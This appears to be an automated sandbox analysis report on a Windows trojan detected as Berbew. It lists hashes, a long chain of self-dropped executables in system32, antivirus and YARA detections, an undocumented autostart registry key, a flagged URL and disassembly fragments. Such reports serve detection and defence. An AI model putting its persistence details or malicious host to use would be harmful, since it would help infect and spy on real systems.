Windows Analysis Report
h879iieoae.exe

Overview

General Information

Sample name: h879iieoae.exe (renamed because the original name is a hash value)
Original sample name: 55f3f17f1a264e2b9a8aa9d5750696688fc4a7bbd530ab74224db9939c974d09.exe
Analysis ID: 1545775
MD5: b6ff4e20e2b53b684a7cb84630d836fa
SHA1: 58f690a95f195f70e6fc59ce67855941bd817f7a
SHA256: 55f3f17f1a264e2b9a8aa9d5750696688fc4a7bbd530ab74224db9939c974d09
Tags: arch-x64, arch-x86, exe, image-win10v2004-20241007-en, locale-en-us, os-windows10-2004-x64, system, hatchingtraige, neikiinsightportal, user-NeikiSamples

Detection

Berbew
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Berbew
AI detected suspicious sample
Creates an undocumented autostart registry key
Drops executables to the windows directory (C:\Windows) and starts them
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file has a writeable .text section
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to search for IE or Outlook window (often done to steal information)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
PE file contains more sections than normal
PE file contains sections with non-standard names
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Uses 32bit PE files

Classification

  • System is w10x64
  • h879iieoae.exe (PID: 6496 cmdline: "C:\Users\user\Desktop\h879iieoae.exe" MD5: B6FF4E20E2B53B684A7CB84630D836FA)
    • Nejhbi32.exe (PID: 6544 cmdline: C:\Windows\system32\Nejhbi32.exe MD5: 0603E4CBD8760D07DD7DCAB05A92238A)
      • Ogjdllpi.exe (PID: 6604 cmdline: C:\Windows\system32\Ogjdllpi.exe MD5: B9761DC0E2D962AEFE92F6E1F3C1F250)
        • Opbieagi.exe (PID: 6648 cmdline: C:\Windows\system32\Opbieagi.exe MD5: 04F64BB1853F025B09D78A47FA5C7F7B)
          • Oglabl32.exe (PID: 6692 cmdline: C:\Windows\system32\Oglabl32.exe MD5: EB5F811B6A66908B38FB889817D5988F)
            • Olijjb32.exe (PID: 6744 cmdline: C:\Windows\system32\Olijjb32.exe MD5: 6E56FF877D11D4ED11AF106FBDDD4ACE)
              • Oeanchcn.exe (PID: 6768 cmdline: C:\Windows\system32\Oeanchcn.exe MD5: 1B2425A45E8ED6237FBE4E56F276A504)
                • Oceoll32.exe (PID: 6824 cmdline: C:\Windows\system32\Oceoll32.exe MD5: 1DB24B47BF090833A70E0BEA68A38D9F)
                  • Onkcje32.exe (PID: 6860 cmdline: C:\Windows\system32\Onkcje32.exe MD5: 7862075539A938767C526CCB7DF7CF4E)
                    • Odekfoij.exe (PID: 6928 cmdline: C:\Windows\system32\Odekfoij.exe MD5: A30DE8FF39A8563F2D7B9E36AD05A4C6)
                      • Ojacofgb.exe (PID: 6992 cmdline: C:\Windows\system32\Ojacofgb.exe MD5: AF41FAF03E8EAED376F154722746385B)
                        • Ppllkpoo.exe (PID: 7064 cmdline: C:\Windows\system32\Ppllkpoo.exe MD5: 38F64F662EE5C7E45202627AA7FCACCC)
                          • Plbmqa32.exe (PID: 7092 cmdline: C:\Windows\system32\Plbmqa32.exe MD5: 40D460D476E3EF9238CDEC233DCA293E)
                            • Plgflqpn.exe (PID: 7084 cmdline: C:\Windows\system32\Plgflqpn.exe MD5: 746D9DB8F43CEAFB79CE4693732F31F4)
                              • Pqeoao32.exe (PID: 3808 cmdline: C:\Windows\system32\Pqeoao32.exe MD5: A195A0011B7154E41E7FCDE5D8B4E0CA)
                                • Qgcpihjl.exe (PID: 2896 cmdline: C:\Windows\system32\Qgcpihjl.exe MD5: B46EDD174CAE8D3583851F8A26241E40)
                                  • Ajkolbad.exe (PID: 4956 cmdline: C:\Windows\system32\Ajkolbad.exe MD5: 9A076EA5029217C545E15BC92444072D)
                                    • Bmlhnnne.exe (PID: 2056 cmdline: C:\Windows\system32\Bmlhnnne.exe MD5: A98CEA1775884370D8699936D1B8E227)
                                      • Bgamkfnl.exe (PID: 2924 cmdline: C:\Windows\system32\Bgamkfnl.exe MD5: 2DAF6E68C4322E5ABD5103F013110A0D)
                                        • Bqjacldl.exe (PID: 2256 cmdline: C:\Windows\system32\Bqjacldl.exe MD5: D92B3B389B0B969DCC1638C63737002A)
                                          • Bnnampcf.exe (PID: 5640 cmdline: C:\Windows\system32\Bnnampcf.exe MD5: F015A56D85709788B392A68459FEB024)
                                            • Bnpnbp32.exe (PID: 6188 cmdline: C:\Windows\system32\Bnpnbp32.exe MD5: 7E024C6EF36928FEE4659AE588ED4D43)
                                              • Bgibkegc.exe (PID: 1740 cmdline: C:\Windows\system32\Bgibkegc.exe MD5: 0DBB530A0BE511F3DC794C1024460A99)
                                                • Baagdk32.exe (PID: 916 cmdline: C:\Windows\system32\Baagdk32.exe MD5: 1F4BBF60BA2126DD626006EB2F22CA9D)
                                                  • Cfnpmb32.exe (PID: 1188 cmdline: C:\Windows\system32\Cfnpmb32.exe MD5: 3E45EB0DFCF7ACE28698143C3D650109)
                                                    • Ccapffke.exe (PID: 7104 cmdline: C:\Windows\system32\Ccapffke.exe MD5: 713B5E4D81DBB20F5D48D2BC5501A007)
                                                      • Ceampi32.exe (PID: 6460 cmdline: C:\Windows\system32\Ceampi32.exe MD5: 7008B57588331F2C9C3672BB96521844)
                                                        • Cnjaioih.exe (PID: 4284 cmdline: C:\Windows\system32\Cnjaioih.exe MD5: CA30D43E91B9417EA485DABDD1CCD228)
                                                          • Camgpi32.exe (PID: 7180 cmdline: C:\Windows\system32\Camgpi32.exe MD5: AFB7FE6A2325DC169AF337B02D73EA13)
                                                            • Dmfdkj32.exe (PID: 7196 cmdline: C:\Windows\system32\Dmfdkj32.exe MD5: 8A37BEE9F75CA0545946D3034A19B27A)
                                                              • Dnhmjm32.exe (PID: 7212 cmdline: C:\Windows\system32\Dnhmjm32.exe MD5: 305D22424B3635688BD806671F6F8A9C)
                                                                • Dfcboo32.exe (PID: 7228 cmdline: C:\Windows\system32\Dfcboo32.exe MD5: E467DF0B06CAE41308F8F0A6E1F35FBA)
                                                                  • Edgbhcim.exe (PID: 7244 cmdline: C:\Windows\system32\Edgbhcim.exe MD5: 4396DFC06DB43385A7F834F79F6CA36B)
                                                                    • Emogai32.exe (PID: 7260 cmdline: C:\Windows\system32\Emogai32.exe MD5: E5B571BCF3D5D371B03E73AAAE92245B)
                                                                      • Efgkjnfn.exe (PID: 7276 cmdline: C:\Windows\system32\Efgkjnfn.exe MD5: B024F2548F4F6ADC9F3DCD68E53CB2CC)
                                                                        • Eoappk32.exe (PID: 7292 cmdline: C:\Windows\system32\Eoappk32.exe MD5: B8C0A2511B4FA693AE579E90FCE526AD)
                                                                          • Fkogfkdj.exe (PID: 7312 cmdline: C:\Windows\system32\Fkogfkdj.exe MD5: 151422544613301F6704413C52E381B0)
                                                                            • Fhedeo32.exe (PID: 7328 cmdline: C:\Windows\system32\Fhedeo32.exe MD5: 03114EFDB305B36B603B7F89B84FE057)
                                                                              • Feidnc32.exe (PID: 7344 cmdline: C:\Windows\system32\Feidnc32.exe MD5: 635F3B50D2C2626B8575FD1AD6A4CE99)
                                                                                • Foaigifk.exe (PID: 7368 cmdline: C:\Windows\system32\Foaigifk.exe MD5: 1FC2CFC732D1C3E7577F946BB2663E80)
  • cleanup
No configs have been found
Yara matches in process memory dumps (5 of 75 entries shown):

Source | Rule | Description | Author | Strings
0000000E.00000002.1998469389.000000000042A000.00000004.00000001.01000000.00000011.sdmp | JoeSecurity_Berbew | Yara detected Berbew | Joe Security |
00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmp | JoeSecurity_Berbew | Yara detected Berbew | Joe Security |
00000017.00000002.2006552400.000000000042A000.00000004.00000001.01000000.0000001A.sdmp | JoeSecurity_Berbew | Yara detected Berbew | Joe Security |
00000025.00000002.2029721811.000000000042A000.00000004.00000001.01000000.00000028.sdmp | JoeSecurity_Berbew | Yara detected Berbew | Joe Security |
00000021.00000002.2021263243.000000000042A000.00000004.00000001.01000000.00000024.sdmp | JoeSecurity_Berbew | Yara detected Berbew | Joe Security |

Yara matches in unpacked PE files (5 of 75 entries shown):

Source | Rule | Description | Author | Strings
24.2.Cfnpmb32.exe.42aa84.1.raw.unpack | JoeSecurity_Berbew | Yara detected Berbew | Joe Security |
3.2.Opbieagi.exe.42aa84.1.raw.unpack | JoeSecurity_Berbew | Yara detected Berbew | Joe Security |
25.2.Ccapffke.exe.42aa84.1.raw.unpack | JoeSecurity_Berbew | Yara detected Berbew | Joe Security |
27.2.Cnjaioih.exe.42aa84.1.raw.unpack | JoeSecurity_Berbew | Yara detected Berbew | Joe Security |
19.2.Bqjacldl.exe.400000.0.unpack | JoeSecurity_Berbew | Yara detected Berbew | Joe Security |

                      System Summary

Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: {79FEACFF-FFCE-815E-A900-316290B5B738}, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\h879iieoae.exe, ProcessId: 6496, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger
                      No Suricata rule has matched

                      AV Detection

Source: h879iieoae.exe | Avira: detected
Source: C:\Windows\SysWOW64\Accicdme.dll | Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: C:\Windows\SysWOW64\Efgkjnfn.exe | Avira: detection malicious, Label: TR/Spy.Qukart.NB
Source: C:\Windows\SysWOW64\Bgibkegc.exe | Avira: detection malicious, Label: TR/Spy.Qukart.NB
Source: C:\Windows\SysWOW64\Bgamkfnl.exe | Avira: detection malicious, Label: TR/Spy.Qukart.NB
Source: C:\Windows\SysWOW64\Cnjaioih.exe | Avira: detection malicious, Label: TR/Spy.Qukart.NB
Source: C:\Windows\SysWOW64\Dfcboo32.exe | Avira: detection malicious, Label: TR/Spy.Qukart.NB
Source: C:\Windows\SysWOW64\Ckaenpam.dll | Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: C:\Windows\SysWOW64\Baagdk32.exe | Avira: detection malicious, Label: TR/Spy.Qukart.NB
Source: C:\Windows\SysWOW64\Bnnampcf.exe | Avira: detection malicious, Label: TR/Spy.Qukart.NB
Source: C:\Windows\SysWOW64\Eoappk32.exe | Avira: detection malicious, Label: TR/Spy.Qukart.NB
Source: C:\Windows\SysWOW64\Ajikgq32.dll | Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: C:\Windows\SysWOW64\Ajkolbad.exe | Avira: detection malicious, Label: TR/Spy.Qukart.NB
Source: C:\Windows\SysWOW64\Chfnmf32.dll | Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: C:\Windows\SysWOW64\Bdlhdkdf.dll | Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: C:\Windows\SysWOW64\Cfnpmb32.exe | Avira: detection malicious, Label: TR/Spy.Qukart.NB
Source: C:\Windows\SysWOW64\Clqdacnn.dll | Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: C:\Windows\SysWOW64\Dnhmjm32.exe | Avira: detection malicious, Label: TR/Spy.Qukart.NB
Source: C:\Windows\SysWOW64\Bpghkh32.dll | Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: C:\Windows\SysWOW64\Edgbhcim.exe | Avira: detection malicious, Label: TR/Spy.Qukart.NB
Source: C:\Windows\SysWOW64\Bnpnbp32.exe | Avira: detection malicious, Label: TR/Spy.Qukart.NB
Source: C:\Windows\SysWOW64\Ekpkmk32.dll | Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: C:\Windows\SysWOW64\Ccapffke.exe | Avira: detection malicious, Label: TR/Spy.Qukart.NB
Source: C:\Windows\SysWOW64\Ekpjke32.dll | Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: C:\Windows\SysWOW64\Emogai32.exe | Avira: detection malicious, Label: TR/Spy.Qukart.NB
Source: C:\Windows\SysWOW64\Ahhhnd32.dll | Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: C:\Windows\SysWOW64\Camgpi32.exe | Avira: detection malicious, Label: TR/Spy.Qukart.NB
Source: C:\Windows\SysWOW64\Dmfdkj32.exe | Avira: detection malicious, Label: TR/Spy.Qukart.NB
Source: C:\Windows\SysWOW64\Ceampi32.exe | Avira: detection malicious, Label: TR/Spy.Qukart.NB
Source: C:\Windows\SysWOW64\Bqjacldl.exe | Avira: detection malicious, Label: TR/Spy.Qukart.NB
Source: C:\Windows\SysWOW64\Bmlhnnne.exe | Avira: detection malicious, Label: TR/Spy.Qukart.NB
Source: C:\Windows\SysWOW64\Akghbg32.dll | Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: http://tat-neftbank.ru/wcmd.htm | Virustotal: Detection: 10%
Source: C:\Windows\SysWOW64\Accicdme.dll | ReversingLabs: Detection: 90%
Source: C:\Windows\SysWOW64\Ahhhnd32.dll | ReversingLabs: Detection: 96%
Source: C:\Windows\SysWOW64\Ajikgq32.dll | ReversingLabs: Detection: 91%
Source: C:\Windows\SysWOW64\Akghbg32.dll | ReversingLabs: Detection: 89%
Source: C:\Windows\SysWOW64\Bdlhdkdf.dll | ReversingLabs: Detection: 100%
Source: C:\Windows\SysWOW64\Bpghkh32.dll | ReversingLabs: Detection: 95%
Source: C:\Windows\SysWOW64\Chfnmf32.dll | ReversingLabs: Detection: 88%
Source: C:\Windows\SysWOW64\Ckaenpam.dll | ReversingLabs: Detection: 91%
Source: C:\Windows\SysWOW64\Clqdacnn.dll | ReversingLabs: Detection: 96%
Source: C:\Windows\SysWOW64\Ekpjke32.dll | ReversingLabs: Detection: 96%
Source: C:\Windows\SysWOW64\Ekpkmk32.dll | ReversingLabs: Detection: 96%
Source: C:\Windows\SysWOW64\Fcjdhk32.dll | ReversingLabs: Detection: 96%
Source: C:\Windows\SysWOW64\Fehgpcld.dll | ReversingLabs: Detection: 92%
Source: C:\Windows\SysWOW64\Fkdfmkhi.dll | ReversingLabs: Detection: 88%
Source: C:\Windows\SysWOW64\Flhljo32.dll | ReversingLabs: Detection: 95%
Source: C:\Windows\SysWOW64\Foelkeee.dll | ReversingLabs: Detection: 91%
Source: C:\Windows\SysWOW64\Gfdcflnh.dll | ReversingLabs: Detection: 96%
Source: C:\Windows\SysWOW64\Hdgplo32.dll | ReversingLabs: Detection: 91%
Source: C:\Windows\SysWOW64\Hjanmb32.dll | ReversingLabs: Detection: 91%
Source: C:\Windows\SysWOW64\Hjdhea32.dll | ReversingLabs: Detection: 95%
Source: C:\Windows\SysWOW64\Hjjfnehb.dll | ReversingLabs: Detection: 96%
Source: C:\Windows\SysWOW64\Ibbpip32.dll | ReversingLabs: Detection: 96%
Source: C:\Windows\SysWOW64\Ibigijoc.dll | ReversingLabs: Detection: 88%
Source: C:\Windows\SysWOW64\Iemjhp32.dll | ReversingLabs: Detection: 96%
Source: C:\Windows\SysWOW64\Ipqipqal.dll | ReversingLabs: Detection: 95%
Source: C:\Windows\SysWOW64\Jcofqqkm.dll | ReversingLabs: Detection: 91%
Source: C:\Windows\SysWOW64\Jdackq32.dll | ReversingLabs: Detection: 95%
Source: C:\Windows\SysWOW64\Jgemldcp.dll | ReversingLabs: Detection: 96%
Source: C:\Windows\SysWOW64\Kfnpbj32.dll | ReversingLabs: Detection: 96%
Source: C:\Windows\SysWOW64\Khlnhl32.dll | ReversingLabs: Detection: 100%
Source: C:\Windows\SysWOW64\Lbfpda32.dll | ReversingLabs: Detection: 96%
Source: C:\Windows\SysWOW64\Lfcadoap.dll | ReversingLabs: Detection: 89%
Source: C:\Windows\SysWOW64\Lfjejf32.dll | ReversingLabs: Detection: 96%
Source: h879iieoae.exe | ReversingLabs: Detection: 81%
Source: h879iieoae.exe | Virustotal: Detection: 81%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Windows\SysWOW64\Accicdme.dll | Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\Efgkjnfn.exe | Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\Bgibkegc.exe | Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\Bgamkfnl.exe | Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\Cnjaioih.exe | Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\Dfcboo32.exe | Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\Ckaenpam.dll | Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\Baagdk32.exe | Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\Bnnampcf.exe | Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\Eoappk32.exe | Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\Ajikgq32.dll | Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\Ajkolbad.exe | Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\Chfnmf32.dll | Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\Bdlhdkdf.dll | Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\Cfnpmb32.exe | Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\Clqdacnn.dll | Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\Dnhmjm32.exe | Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\Bpghkh32.dll | Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\Edgbhcim.exe | Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\Bnpnbp32.exe | Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\Ekpkmk32.dll | Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\Ccapffke.exe | Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\Ekpjke32.dll | Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\Emogai32.exe | Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\Ahhhnd32.dll | Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\Camgpi32.exe | Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\Dmfdkj32.exe | Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\Ceampi32.exe | Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\Bqjacldl.exe | Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\Bmlhnnne.exe | Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\Akghbg32.dll | Joe Sandbox ML: detected
Source: h879iieoae.exe | Joe Sandbox ML: detected
Source: h879iieoae.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then mov esi, 2D4E56AAh3_2_0042E000
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then je 0042E0D2h3_2_0042E000
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then push eax3_2_0042E000
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then xchg eax, ecx3_2_0042E000
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then add eax, edi3_2_0042E000
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then pop edi3_2_00403AC7
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then mov ebx, 00407EF8h3_2_00403AC7
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then sub ecx, eax3_2_00403AC7
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then xor edx, edx3_2_00403AC7
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then push eax3_2_00403AC7
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then div edi3_2_00403AC7
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then xchg eax, ecx3_2_00403AC7
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then add eax, edi3_2_00403AC7
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then loop 00403B3Eh3_2_00403AC7
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then mov eax, 0042A000h3_2_00403AC7
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then mov ebx, 0042CD70h3_2_00403AC7
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then sub ecx, eax3_2_00403AC7
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then xor edx, edx3_2_00403AC7
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then push eax3_2_00403AC7
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then div edi3_2_00403AC7
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then xchg eax, ecx3_2_00403AC7
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then add eax, edi3_2_00403AC7
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then loop 00403B9Eh3_2_00403AC7
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then popad 3_2_00403AC7
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then je 00403A1Ch3_2_004039CE
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then xor dword ptr [eax], ecx3_2_004039CE
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then inc eax3_2_004039CE
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then jne 004039F2h3_2_004039CE
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then mov eax, 0042A000h3_2_004039CE
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then je 00403A52h3_2_004039CE
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then xor dword ptr [eax], ecx3_2_004039CE
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then add eax, 04h3_2_004039CE
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then jne 00403A3Ah3_2_004039CE
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 4x nop then popad 3_2_004039CE
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4x nop then mov ecx, dword ptr [eax+04h]4_2_00403A6B
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4x nop then add ebx, 04h4_2_00403A6B
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4x nop then jl 00403A8Fh4_2_00403A6B
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4x nop then add eax, 0Ch4_2_00403A6B
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4x nop then popad 4_2_00403A6B
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4x nop then mov ecx, dword ptr [eax+04h]4_2_0042E00C
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4x nop then pop edi4_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4x nop then mov ebx, 00407EF8h4_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4x nop then sub ecx, eax4_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4x nop then xor edx, edx4_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4x nop then push eax4_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4x nop then div edi4_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4x nop then xchg eax, ecx4_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4x nop then add eax, edi4_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4x nop then loop 00403B3Eh4_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4x nop then mov eax, 0042A000h4_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4x nop then mov ebx, 0042CD70h4_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4x nop then sub ecx, eax4_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4x nop then xor edx, edx4_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4x nop then push eax4_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4x nop then div edi4_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4x nop then xchg eax, ecx4_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4x nop then add eax, edi4_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4x nop then loop 00403B9Eh4_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4x nop then popad 4_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4x nop then je 00403A1Ch4_2_004039CE
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4x nop then xor dword ptr [eax], ecx4_2_004039CE
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4x nop then inc eax4_2_004039CE
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4x nop then jne 004039F2h4_2_004039CE
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4x nop then mov eax, 0042A000h4_2_004039CE
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4x nop then je 00403A52h4_2_004039CE
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4x nop then xor dword ptr [eax], ecx4_2_004039CE
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4x nop then add eax, 04h4_2_004039CE
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4x nop then jne 00403A3Ah4_2_004039CE
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4x nop then popad 4_2_004039CE
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then mov ecx, dword ptr [eax+04h]5_2_00403A6B
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then add ebx, 04h5_2_00403A6B
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then jl 00403A8Fh5_2_00403A6B
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then add eax, 0Ch5_2_00403A6B
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then popad 5_2_00403A6B
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then test eax, eax5_2_0042E000
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then inc eax5_2_0042E000
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then cmp eax, ebx5_2_0042E000
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then pop edi5_2_00403AC7
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then mov ebx, 00407EF8h5_2_00403AC7
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then sub ecx, eax5_2_00403AC7
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then xor edx, edx5_2_00403AC7
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then push eax5_2_00403AC7
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then div edi5_2_00403AC7
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then xchg eax, ecx5_2_00403AC7
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then add eax, edi5_2_00403AC7
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then loop 00403B3Eh5_2_00403AC7
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then mov eax, 0042A000h5_2_00403AC7
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then mov ebx, 0042CD70h5_2_00403AC7
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then sub ecx, eax5_2_00403AC7
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then xor edx, edx5_2_00403AC7
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then push eax5_2_00403AC7
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then div edi5_2_00403AC7
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then xchg eax, ecx5_2_00403AC7
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then add eax, edi5_2_00403AC7
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then loop 00403B9Eh5_2_00403AC7
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then popad 5_2_00403AC7
